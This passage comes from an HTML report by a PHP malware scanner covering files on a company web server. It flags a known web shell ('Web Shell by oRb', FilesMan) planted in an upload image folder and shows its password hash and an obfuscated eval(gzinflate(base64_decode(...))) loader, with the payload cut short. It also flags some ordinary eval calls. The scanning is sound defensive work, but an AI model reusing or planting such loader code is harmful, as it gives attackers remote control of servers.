<span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">"/.*/e"</span><span style="color: #007700">,</span><span style="color: #DD0000">"\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/O7ddnZ++7H+Ctu/tq/+jMvqywCvv6P39j8FOaR264O3KnccTazAlD57ZsvQqCke9aVWad+vNwhg/vTo9eBDE+eU7XCftj79oN8fU3Zzpwb/DpxJn0fPhY2eKoh0HoOv1xWS/CiVjJwccKh8EfD2iO4nAWRMtorsqMbK3dZkPHj9ykFvJn7DoDNyxT7o1Grc6e1J+woyBmB8F8OrAlZfLHvfFi7dPd//wN/t+J3Cjyg...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 70782685 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 70782685)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">&lt;?</span><span style="color: #0000BB">php&nbsp;$auth_pass&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"63a9f0ea7bb98050796b649e85481845"</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$color&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"#df5"</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$default_action&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"FilesMan"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">"/.*/e"</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 99fc3b9d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 99fc3b9d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$color&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"#df5"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign b236d073 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: b236d073)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">/</span><span style="color: #0000BB">e</span><span style="color: #DD0000">","</span><span style="color: #007700">\</span><span style="color: #0000BB">x</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d640d21b <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d640d21b)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Web&nbsp;Shell&nbsp;by&nbsp;oRb<br />$auth_pass&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"63a9f0ea7bb98050796b649e85481845"</span><span style="color: #007700">;&nbsp;</span><span style="color: #FF8000">#root<br /></span><span style="color: #0000BB">$color&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"#df5"</span><span style="color: #007700">;<br /></span><span style="color: #0000BB">$default_action&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"FilesMan"</span><span style="color: #007700">;<br /></span><span style="color: #0000BB">$default_charset&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"Windows-1251"</span><span style="color: #007700">;<br /></span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">"/.*/e"</span><span style="color: #007700">,</span><span style="color: #DD0000">"\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/O7ddnZ++7H+Ctu/tq/+jMvqywCvv6P39j8FOaR264O3KnccTazAlD57ZsvQqCke9aVWad+vNwhg/vTo9...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_72").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/old.liko-holding.com.ua/modules/pages/upload/image/11.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 22.72 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:05:56</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:40</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 13</span><br><table id="file_73" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/O7ddnZ++7H+Ctu/tq/+jMvqywCvv6P39j8FOaR264O3KnccTazAlD57ZsvQqCke9aVWad+vNwhg/vTo9eBDE+eU7XCftj79oN8fU3Zzpwb/DpxJn0fPhY2eKoh0HoOv1xWS/CiVjJwccKh8EfD2iO4nAWRMtorsqMbK3dZkPHj9ykFvJn7DoDNyxT7o1Grc6e1J+woyBmB8F8OrAlZfLHvfFi7dPd//wN/t+J3Cjygmk3ip0wLmOeHTcMg7AburMgjL3pqFynr97U60ZuXLZ5sh+M7OrRh7dvzUT43CWAyK6m8k2cm6574/bnMZYXexNXgkAyvXd9b+LF5eTjxBl5/e4f8yB2o244nyKQSB64Q2/qlm1ov9P...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_preg <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through PCRE (Perl compatible Regular Expression), allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">"/.*/e"</span><span style="color: #007700">,</span><span style="color: #DD0000">"eval(gzinflate(base64_decode('7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/O7ddnZ++7H+Ctu/tq/+jMvqywCvv6P39j8FOaR264O3KnccTazAlD57ZsvQqCke9aVWad+vNwhg/vTo9eBDE+eU7XCftj79oN8fU3Zzpwb/DpxJn0fPhY2eKoh0HoOv1xWS/CiVjJwccKh8EfD2iO4nAWRMtorsqMbK3dZkPHj9ykFvJn7DoDNyxT7o1Grc6e1J+woyBmB8F8OrAlZfLHvfFi7dPd//wN/t+J3Cjygmk3ip0wLmOeHTcMg7AburMgjL3pqFynr97U60ZuXLZ5sh+M7OrRh7dvzUT43CWAyK6m8k2cm6574/bnMZYXexNX...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_preg <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through PCRE (Perl compatible Regular Expression), allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">"/.*/e"</span><span style="color: #007700">,</span><span style="color: #DD0000">"\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/O7ddnZ++7H+Ctu/tq/+jMvqywCvv6P39j8FOaR264O3KnccTazAlD57ZsvQqCke9aVWad+vNwhg/vTo9eBDE+eU7XCftj79oN8fU3Zzpwb/DpxJn0fPhY2eKoh0HoOv1xWS/CiVjJwccKh8EfD2iO4nAWRMtorsqMbK3dZkPHj9ykFvJn7DoDNyxT7o1Grc6e1J+woyBmB8F8OrAlZfLHvfFi7dPd//wN/t+J3Cjyg...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/O7ddnZ++7H+Ctu/tq/+jMvqywCvv6P39j8FOaR264O3KnccTazAlD57ZsvQqCke9aVWad+vNwhg/vTo9eBDE+eU7XCftj79oN8fU3Zzpwb/DpxJn0fPhY2eKoh0HoOv1xWS/CiVjJwccKh8EfD2iO4nAWRMtorsqMbK3dZkPHj9ykFvJn7DoDNyxT7o1Grc6e1J+woyBmB8F8OrAlZfLHvfFi7dPd//wN/t+J3Cjygmk3ip0wLmOeHTcMg7AburMgjL3pqFynr97U60ZuXLZ5sh+M7OrRh7dvzUT43CWAyK6m8k2cm6574/bnMZYXexNXgkAyvXd9b+LF5eTjxBl5/e...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit hex_char <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hex char is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">\</span><span style="color: #0000BB">x5F</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/O7ddnZ++7H+Ctu/tq/+jMvqywCvv6P39j8FOaR264O3KnccTazAlD57ZsvQqCke9aVWad+vNwhg/vTo9eBDE+eU7XCftj79oN8fU3Zzpwb/DpxJn0fPhY2eKoh0HoOv1xWS/CiVjJwccKh8EfD2iO4nAWRMtorsqMbK3dZkPHj9ykFvJn7DoDNyxT7o1Grc6e1J+woyBmB8F8OrAlZfLHvfFi7dPd//wN/t+J3Cjygmk3ip0wLmOeHTcMg7AburMgjL3pqFynr97U60ZuXLZ5sh+M7OrRh7dvzUT43CWAyK6m8k2cm6574/bnMZYXexNXgkAyvXd9b+LF5eTjxBl5/e...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 237750ea <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 237750ea)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">\</span><span style="color: #0000BB">x65</span><span style="color: #007700">\</span><span style="color: #0000BB">x76</span><span style="color: #007700">\</span><span style="color: #0000BB">x61</span><span style="color: #007700">\</span><span style="color: #0000BB">x6C</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 34b7e999 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 34b7e999)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">default_action&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"FilesMan</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 39ce8596 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 39ce8596)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">"/.*/e"</span><span style="color: #007700">,</span><span style="color: #DD0000">"\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/O7ddnZ++7H+Ctu/tq/+jMvqywCvv6P39j8FOaR264O3KnccTazAlD57ZsvQqCke9aVWad+vNwhg/vTo9eBDE+eU7XCftj79oN8fU3Zzpwb/DpxJn0fPhY2eKoh0HoOv1xWS/CiVjJwccKh8EfD2iO4nAWRMtorsqMbK3dZkPHj9ykFvJn7DoDNyxT7o1Grc6e1J+woyBmB8F8OrAlZfLHvfFi7dPd//wN/t+J3Cjyg...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 70782685 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 70782685)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">&lt;?</span><span style="color: #0000BB">php&nbsp;$auth_pass&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"63a9f0ea7bb98050796b649e85481845"</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$color&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"#df5"</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$default_action&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"FilesMan"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">"/.*/e"</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 99fc3b9d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 99fc3b9d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$color&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"#df5"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign b236d073 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: b236d073)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">/</span><span style="color: #0000BB">e</span><span style="color: #DD0000">","</span><span style="color: #007700">\</span><span style="color: #0000BB">x</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d640d21b <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d640d21b)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Web&nbsp;Shell&nbsp;by&nbsp;oRb<br />$auth_pass&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"63a9f0ea7bb98050796b649e85481845"</span><span style="color: #007700">;&nbsp;</span><span style="color: #FF8000">#root<br /></span><span style="color: #0000BB">$color&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"#df5"</span><span style="color: #007700">;<br /></span><span style="color: #0000BB">$default_action&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"FilesMan"</span><span style="color: #007700">;<br /></span><span style="color: #0000BB">$default_charset&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"Windows-1251"</span><span style="color: #007700">;<br /></span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">"/.*/e"</span><span style="color: #007700">,</span><span style="color: #DD0000">"\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/O7ddnZ++7H+Ctu/tq/+jMvqywCvv6P39j8FOaR264O3KnccTazAlD57ZsvQqCke9aVWad+vNwhg/vTo9...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_73").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/old.liko-holding.com.ua/modules/basket/oformleniye.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 8.48 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:05:56</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:36</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_74" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 101</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">include(</span><span style="color: #0000BB">$_SERVER</span><span style="color: #007700">[</span><span style="color: #0000BB">DOCUMENT_ROOT</span><span style="color: #007700">].</span><span style="color: #DD0000">"/modules/auth/antispamimg.php"</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_74").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/old.liko-holding.com.ua/modules/functions/functions.com.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 53.39 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:05:56</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:36</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_75" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(&nbsp;</span><span style="color: #0000BB">stripslashes</span><span style="color: #007700">(</span><span style="color: #0000BB">$macr</span><span style="color: #007700">[</span><span style="color: #DD0000">'code'</span><span style="color: #007700">]));&nbsp;</span><span style="color: #0000BB">$values</span><span style="color: #007700">[]&nbsp;=&nbsp;</span><span style="color: #0000BB">stripslashes</span><span style="color: #007700">(</span><span style="color: #0000BB">ob_get_contents</span><span style="color: #007700">());&nbsp;</span><span style="color: #0000BB">ob_end_clean</span><span style="color: #007700">();&nbsp;}&nbsp;</span><span style="color: #0000BB">$k</span><span style="color: #007700">=</span><span style="color: #0000BB">0</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$fphrase&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$phrase</span><span style="color: #007700">;&nbsp;do&nbsp;{&nbsp;</span><span style="color: #0000BB">$modified&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$newphrase&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #0000BB">$macroses</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$values</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$fphrase</span><span style="color: #007700">);&nbsp;if&nbsp;(</span><span style="color: #0000BB">$newphrase&nbsp;</span><span style="color: #007700">!==&nbsp;</span><span style="color: #0000BB">$fphrase</span><span style="color: #007700">)&nbsp;</span><span style="color: #0000BB">$modified&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">true</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$fphrase&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$newphrase</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$k</span><span style="color: #007700">++;&nbsp;}&nbsp;while(</span><span style="color: #0000BB">$modified&nbsp;</span><span style="color: #007700">&amp;&amp;&nbsp;</span><span style="color: #0000BB">$k&nbsp;</span><span style="color: #007700">&lt;&nbsp;</span><span style="color: #0000BB">10&nbsp;</span><span style="color: #007700">&amp;&amp;&nbsp;!empty(</span><span style="color: #0000BB">$phrase</span><span style="color: #007700">));&nbsp;return&nbsp;</span><span style="color: #0000BB">$newphrase</span><span style="color: #007700">;&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">pars_banner_admin</span><span style="color: #007700">(</span><span style="color: #0000BB">$input_code</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$input_arr</span><span style="color: #007700">=</span><span style="color: #DD0000">''</span><span style="color: #007700">)&nbsp;{&nbsp;if&nbsp;(</span><span style="color: #0000BB">$input_arr&nbsp;</span><span style="color: #007700">!=&nbsp;</span><span style="color: #DD0000">''</span><span style="color: #007700">)&nbsp;{&nbsp;for&nbsp;(</span><span style="color: #0000BB">$i</span><span style="color: #007700">=</span><span style="color: #0000BB">0</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$i</span><span style="color: #007700">&lt;</span><span style="color: #0000BB">count</span><span style="color: #007700">(</span><span style="color: #0000BB">$input_arr</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$i</span><span style="color: #007700">++)&nbsp;{&nbsp;if&nbsp;(</span><span style="color: #0000BB">strpos</span><span style="color: #007700">(</span><span style="color: #0000BB">$input_code</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$i</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_75").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/old.liko-holding.com.ua/modules/template/loadmacros.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 758.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:05:50</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:41</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_76" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">stripslashes</span><span style="color: #007700">(</span><span style="color: #0000BB">$macro</span><span style="color: #007700">[</span><span style="color: #DD0000">'code'</span><span style="color: #007700">]));&nbsp;</span><span style="color: #0000BB">$value&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">stripslashes</span><span style="color: #007700">(</span><span style="color: #0000BB">ob_get_contents</span><span style="color: #007700">());&nbsp;</span><span style="color: #0000BB">ob_end_clean</span><span style="color: #007700">();&nbsp;</span><span style="color: #0000BB">$out_code&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">pars_out_text_all</span><span style="color: #007700">(</span><span style="color: #0000BB">$value</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$out_code&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">pars_img</span><span style="color: #007700">(</span><span style="color: #0000BB">$out_code</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$out_code&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">pars_out_text</span><span style="color: #007700">(</span><span style="color: #0000BB">$out_code</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$out_code&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">pars_lng</span><span style="color: #007700">(</span><span style="color: #0000BB">$out_code</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_76").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/old.liko-holding.com.ua/modules/template/tpl.fns.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 3.94 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:05:50</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:41</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_77" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 